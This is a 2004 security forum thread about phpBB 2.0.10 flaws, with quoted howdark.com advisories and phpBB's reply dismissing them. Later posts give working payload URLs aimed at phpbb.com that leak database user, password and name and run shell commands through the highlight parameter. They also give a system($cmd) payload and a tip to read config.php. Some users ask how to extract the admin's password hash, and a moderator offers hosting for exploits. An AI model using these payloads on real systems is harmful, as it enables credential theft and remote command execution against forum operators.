Login or Register :: Home :: Search :: Your Account :: Forums :: Waraxe Advisories :: Tools :: July 27, 2024 Menu Home Logout Discussions Forums Members List IRC chat Tools Base64 coder MD5 hash CRC32 checksum ROT13 coder SHA-1 hash URL-decoder Sql Char Encoder Affiliates y3dips ITsec Md5 Cracker User Manuals AlbumNow Content Content Sections FAQ Top Info Feedback Recommend Us Search Journal Your Account User Info Welcome, Anonymous Nickname Password (Register) Membership: Latest: MichaelSnaRe New Today: 0 New Yesterday: 0 Overall: 9144 People Online: Visitors: 184 Members: 0 Total: 184 Full disclosure CyberDanube Security Research 20240722-0 | Multiple Vulnerabilities in Perten/PerkinElmer ProcessPlus [KIS-2024-06] XenForo <= 2.2.15 (Template System) Remote Code Execution Vulnerability [KIS-2024-05] XenForo <= 2.2.15 (Widget::actionSave) Cross-Site Request Forgery Vulnerability CVE-2024-33326 CVE-2024-33327 CVE-2024-33328 CVE-2024-33329 CyberDanube Security Research 20240703-0 | Authenticated Command Injection in Helmholz Industrial Router REX100 SEC Consult SA-20240627-0 :: Local Privilege Escalation via MSI installer in SoftMaker Office / FreeOffice SEC Consult SA-20240626-0 :: Multiple Vulnerabilities in Siemens Power Automation Products Novel DoS Vulnerability Affecting WebRTC Media Servers APPLE-SA-06-25-2024-1 AirPods Firmware Update 6A326, AirPods Firmware Update 6F8, and Beats Firmware Update 6F8 40 vulnerabilities in Toshiba Multi-Function Printers 17 vulnerabilities in Sharp Multi-Function Printers SEC Consult SA-20240624-0 :: Multiple Vulnerabilities allowing complete bypass in Faronics WINSelect (Standard + Enterprise) IT Security and Insecurity Portal www.waraxe.us Forum Index -> PhpBB -> vulns in phpbb 2.0.10 Goto page 1, 2, 3, 4Next View previous topic :: View next topic vulns in phpbb 2.0.10 Posted: Mon Nov 15, 2004 5:56 pm hebe Advanced user Joined: Sep 04, 2004 Posts: 59 Quote: | | | | | _ \ | | | |_| | _____ __ | | | |__ _ _ __| | __ | _ |/ _ \ \ /\ / / | | | / _` | '__| |/ / | | | | (_) \ V V / | |/ / (_| | | | < \_| |_/\___/ \_/\_/ |___/ \__,_|_| |_|\_\ http://www.howdark.com ---------------------------------------------------------------------------------------------------------------------------------- // Information ---------------------------------------------------------------------------------------------------------------------------------- Author: How Dark Date: October 14, 2004 URL: http://www.howdark.com Affected Software: phpBB 2 Software Version: 2.0.* - 2.0.10 Software URL: http://www.phpbb.com Attack: SQL Injection, allowing people to minipulate the query into pulling data they should not previously be able too obtain. (Such as passwords) Description: Requiring the account be a moderator, or having a moderation session with the correct cookie to actually execute this attack, it is not that big of an issue, but it still is there. ---------------------------------------------------------------------------------------------------------------------------------- xxx ---------------------------------------------------------------------------------------------------------------------------------- // Description ---------------------------------------------------------------------------------------------------------------------------------- Including a F (forum), with a MODE, but without a T (topic) leads to SQL error. But because of topic turning all user input values into numbers, the injection is useless, unless a way around this was found. ---------------------------------------------------------------------------------------------------------------------------------- xxx ---------------------------------------------------------------------------------------------------------------------------------- // URL ---------------------------------------------------------------------------------------------------------------------------------- modcp.php?mode=[mode]&f=1&t=[SQL]&sid=[your mod session] ---------------------------------------------------------------------------------------------------------------------------------- xxx ---------------------------------------------------------------------------------------------------------------------------------- // Line: 801 ---------------------------------------------------------------------------------------------------------------------------------- $sql = "SELECT u.username, p.*, pt.post_text, pt.bbcode_uid, pt.post_subject, p.post_username FROM " . POSTS_TABLE . " p, " . USERS_TABLE . " u, " . POSTS_TEXT_TABLE . " pt WHERE p.topic_id = $topic_id AND p.poster_id = u.user_id AND p.post_id = pt.post_id ORDER BY p.post_time ASC"; ---------------------------------------------------------------------------------------------------------------------------------- // Line: 806 ---------------------------------------------------------------------------------------------------------------------------------- ---------------------------------------------------------------------------------------------------------------------------------- // SQL Error ---------------------------------------------------------------------------------------------------------------------------------- Could not get topic/post information DEBUG MODE SQL Error : 1064 You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND p.poster_id = u.user_id AND p.post_id = pt.post_id SELECT u.username, p.*, pt.post_text, pt.bbcode_uid, pt.post_subject, p.post_username FROM htf_posts p, htf_users u, htf_posts_text pt WHERE p.topic_id = AND p.poster_id = u.user_id AND p.post_id = pt.post_id ORDER BY p.post_time ASC Line : 809 File : modcp.php 2nd Quote: _ _ ______ _ | | | | | _ \ | | | |_| | _____ __ | | | |__ _ _ __| | __ | _ |/ _ \ \ /\ / / | | | / _` | '__| |/ / | | | | (_) \ V V / | |/ / (_| | | | < \_| |_/\___/ \_/\_/ |___/ \__,_|_| |_|\_\ http://www.howdark.com ---------------------------------------------------------------------------------------------------------------------------------- // Information ---------------------------------------------------------------------------------------------------------------------------------- Author: How Dark Date: October 1, 2004 URL: http://www.howdark.com Affected Software: phpBB 2 Software Version: 2.0.* - 2.0.10 Software URL: http://www.phpbb.com Attack: SQL Injection, allowing people to minipulate the query into pulling data they should not previously be able too obtain. (Such as passwords) Arbituary EXEC allows you, if you can get on to a new line, to execute your own PHP, which can be fatal. Description: Because of the way urldecode and magic quotes works, it turns %2527 into %27, which is a single quote, and it leaves it unslashed. This gives you a SQL Injection, leading to arbituary PHP exec hole. But because you can't get outside preg_replace because of magic quotes, this is very very useless. ---------------------------------------------------------------------------------------------------------------------------------- xxx ---------------------------------------------------------------------------------------------------------------------------------- // Description ---------------------------------------------------------------------------------------------------------------------------------- Highlighting %2527 on any topic. ---------------------------------------------------------------------------------------------------------------------------------- xxx ---------------------------------------------------------------------------------------------------------------------------------- // URL ---------------------------------------------------------------------------------------------------------------------------------- viewtopic.php?t=1&highlight=%2527 ---------------------------------------------------------------------------------------------------------------------------------- xxx ---------------------------------------------------------------------------------------------------------------------------------- // Error ---------------------------------------------------------------------------------------------------------------------------------- Parse error: parse error, unexpected T_STRING in viewtopic.php(1109) : regexp code on line 1 Fatal error: Failed evaluating code: preg_replace('#\b(')\b#i', '\1', '>[POST TEXT HERE]<') in viewtopic.php on line 1109 --------------------------------------------------------------------------------------------------------- psoftx write that in the phpbb comunity Code: We've have had and continue to receive reports based on a bugtraq email submitted by the "howdark.com" group. Please do not report these issues to us, not by PM, email nor via our security tracker. The two "sql injection" issues are not sql injection issues, nothing can be done with them at all due to type casting (strings are forced to an integer type). The group admit this themselves but persist in claiming they are sql injection issues. The "solution" they give contains semantically incorrect SQL (you do not enclose values for integer field types in quotes). The third issue, search highlighting, has been checked by us several times and we can do nothing with it at all. Again, that particular group admit likewise. In a future release of 2.0.x we will eliminate the problem once and for all, but as noted it cannot (to our knowledge and as noted, testing) be taken advantage of and thus is not considered by us to be cause for an immediate release. Posted: Mon Nov 15, 2004 11:58 pm jessica Regular user Joined: Sep 18, 2004 Posts: 5 Quote: ----------------------------------------------------------------------------------------------------- // Updates ----------------------------------------------------------------------------------------------------- Just a note on the phpBB finds, they are NOT SQL Injection issues, they are just poorly coded errors, as I had stated. This is just immature of the phpBB Group to say we were presistant about these, considering they were not submitted to BugTRAQ because we knew for a fact they were useless. The highlight error, as I stated is not harmful under the circumstances of the default code, but if presented with minor changes, which is known to some widely known phpBB Boards, they could present problems. The highlight error is NOT, and I repeat NOT, SQL Injection, I am sorry for the misworded presentation. I found this awhile ago, and I asked a friend, who is well knowledged about these subjects, what to label this with the options I had for the phpBB Security Tracker, and this is what he gave me. I did not check over what I sent, stupidly, and that is how it was sent out. Sorry for the incovience Keep note, that these would not even be on BugTRAQ if phpBB were not immature about the bug reports I gave them, and they mildly ignored. Posted: Wed Nov 17, 2004 2:30 pm LINUX Moderator Joined: May 24, 2004 Posts: 404 Location: Caiman psoftx write that in the phpbb comunity Code: We've have had and continue to receive reports based on a bugtraq email submitted by the "howdark.com" group. Please do not report these issues to us, not by PM, email nor via our security tracker. The two "sql injection" issues are not sql injection issues, nothing can be done with them at all due to type casting (strings are forced to an integer type). The group admit this themselves but persist in claiming they are sql injection issues. The "solution" they give contains semantically incorrect SQL (you do not enclose values for integer field types in quotes). The third issue, search highlighting, has been checked by us several times and we can do nothing with it at all. Again, that particular group admit likewise. In a future release of 2.0.x we will eliminate the problem once and for all, but as noted it cannot (to our knowledge and as noted, testing) be taken advantage of and thus is not considered by us to be cause for an immediate release. ---------------------------------- PHPBB developers read read read ERROR ERROR WTF xD Good work Jessica Posted: Thu Nov 18, 2004 1:47 am jessica Regular user Joined: Sep 18, 2004 Posts: 5 Just a note, look how they edit their post now that there's a proof of concept, this one of the most dangerous phpbb exploits ever. Proof of Concept: http://www.howdark.com/phpbb2010.phps Posted: Thu Nov 18, 2004 7:17 am hebe Advanced user Joined: Sep 04, 2004 Posts: 59 jessica wrote: Just a note, look how they edit their post now that there's a proof of concept, this one of the most dangerous phpbb exploits ever. Proof of Concept: http://www.howdark.com/phpbb2010.phps hahah they must patch now and also these 1. "username" is $dbuser: http://www.phpbb.com/phpBB/viewtopic.php?p=1316231&highlight=%2527.$poster=$dbuser.%2527 2. "username" is $dbpasswd: http://www.phpbb.com/phpBB/viewtopic.php?p=1316231&highlight=%2527.$poster=$dbpasswd.%2527 3. "username" is $dbname: http://www.phpbb.com/phpBB/viewtopic.php?p=1316231&highlight=%2527.$poster=$dbname.%2527 4. "username" is result of passthru("id"): http://www.phpbb.com/phpBB/viewtopic.php?p=1316231&highlight=%2527.$poster=`id`.%2527 "username" is result of passthru("ls"): http://www.phpbb.com/phpBB/viewtopic.php?p=1316231&highlight=%2527.$poster=`ls`.%2527 Posted: Thu Nov 18, 2004 8:03 am LINUX Moderator Joined: May 24, 2004 Posts: 404 Location: Caiman OMG very nice Posted: Thu Nov 18, 2004 10:53 am hebe Advanced user Joined: Sep 04, 2004 Posts: 59 jessica wrote: Just a note, look how they edit their post now that there's a proof of concept, this one of the most dangerous phpbb exploits ever. Proof of Concept: http://www.howdark.com/phpbb2010.phps this only works in win servers ? "/viewtopic.php?t=$topic&highlight=%2527%252esystem(".$cmd.")%252e%2527"; cmd? Posted: Thu Nov 18, 2004 1:05 pm jessica Regular user Joined: Sep 18, 2004 Posts: 5 no, it'll work on most os's It'll just limit it to what OS it is.. i.e: unix is ls, and windows is dir. It isn't very useful because you are logged in as no user, so you don't have write permission or anything, so you can read like config.php (cat config.php on unix) and you have to view the page source since config.php has <? ?> and the page parses it thinking it's html. But other then that you are pretty much out of luck. CMD Example Script is here: http://www.howdark.com/exploit Posted: Thu Nov 18, 2004 1:11 pm jessica Regular user Joined: Sep 18, 2004 Posts: 5 And just to think phpBB devs reported me to my ISP for trying to help them with this. assholes. Posted: Fri Nov 19, 2004 3:15 am LINUX Moderator Joined: May 24, 2004 Posts: 404 Location: Caiman jessica you need host for exploits send pm Posted: Sun Nov 21, 2004 1:57 pm sygma Regular user Joined: Nov 21, 2004 Posts: 7 Quote: &highlight=%2527.$poster=$dbname.%2527 is there a way i could make a SQL query and thus obtain the admin's hashed password ? _________________ [i]no word to save thee[/i] Posted: Sun Nov 21, 2004 10:14 pm kranium Regular user Joined: Jun 27, 2004 Posts: 7 sygma wrote: Quote: &highlight=%2527.$poster=$dbname.%2527 is there a way i could make a SQL query and thus obtain the admin's hashed password ? yes i wish i could do that too. i used the exploit in http://www.howdark.com/exploit/ but everytime i try some SQL query it shows me NOTHING any ideas? Posted: Mon Nov 22, 2004 9:34 pm SteX Advanced user Joined: May 18, 2004 Posts: 181 Location: Serbia Dont work for me... _________________ We would change the world, but God won't give us the sourcecode... ....Watch the master. Follow the master. Be the master.... ------------------------------------------------------- Posted: Tue Nov 23, 2004 3:59 am LINUX Moderator Joined: May 24, 2004 Posts: 404 Location: Caiman SteX wrote: Dont work for me... what not work stex? i test work nice exploit work in all phpbb forums 2.0.* - 2.0.10 a Posted: Tue Nov 23, 2004 2:33 pm SteX Advanced user Joined: May 18, 2004 Posts: 181 Location: Serbia What did you entered in SQL tab..? _________________ We would change the world, but God won't give us the sourcecode... ....Watch the master. Follow the master. Be the master.... ------------------------------------------------------- vulns in phpbb 2.0.10 www.waraxe.us Forum Index -> PhpBB You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum All times are GMT Page 1 of 4 Goto page 1, 2, 3, 4Next All Posts1 Day7 Days2 Weeks1 Month3 Months6 Months1 YearOldest FirstNewest First Select a forumSecurity Research by waraxe----------------General discussionHow to fixMetasploit relatedHash cracking requests----------------MD5 hashesAll other hashesHash related informationhttp://www.waraxe.us portal----------------SuggestionsCooperation proposalsSecurity bugs and issues in general----------------Newbies cornerSql injectionCross-site scripting aka XSSRemote file inclusionFull path disclosureShell commands injectionPhishing and Social EngineeringAll other security holesVarious software----------------PhpNukePostNukePhpBBXMB forumvBulletin BoardInvision Power Boarde107MamboJoomlaXOOPSM$ WindowsLinux worldAll other softwareCoppermine Photo GalleryProgramming languages----------------PhpMySqlPerlJavaJavascriptC and C++Visual BasicBorland Delphi and PascalPythonHTML and XMLAssemblerReverse engineering----------------Newbies cornerDisassemblingPHP script decode requestsMiscellaneous stuff----------------Future of the ITNanotechnologyFun cornerLinksTry2hack sitesProxy databaseDirect Downloads----------------ToolsTutorialsWordlistsRecycle Bin----------------Removed messagesOutdated posts Powered by phpBB © 2001-2008 phpBB Group

Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.378 Seconds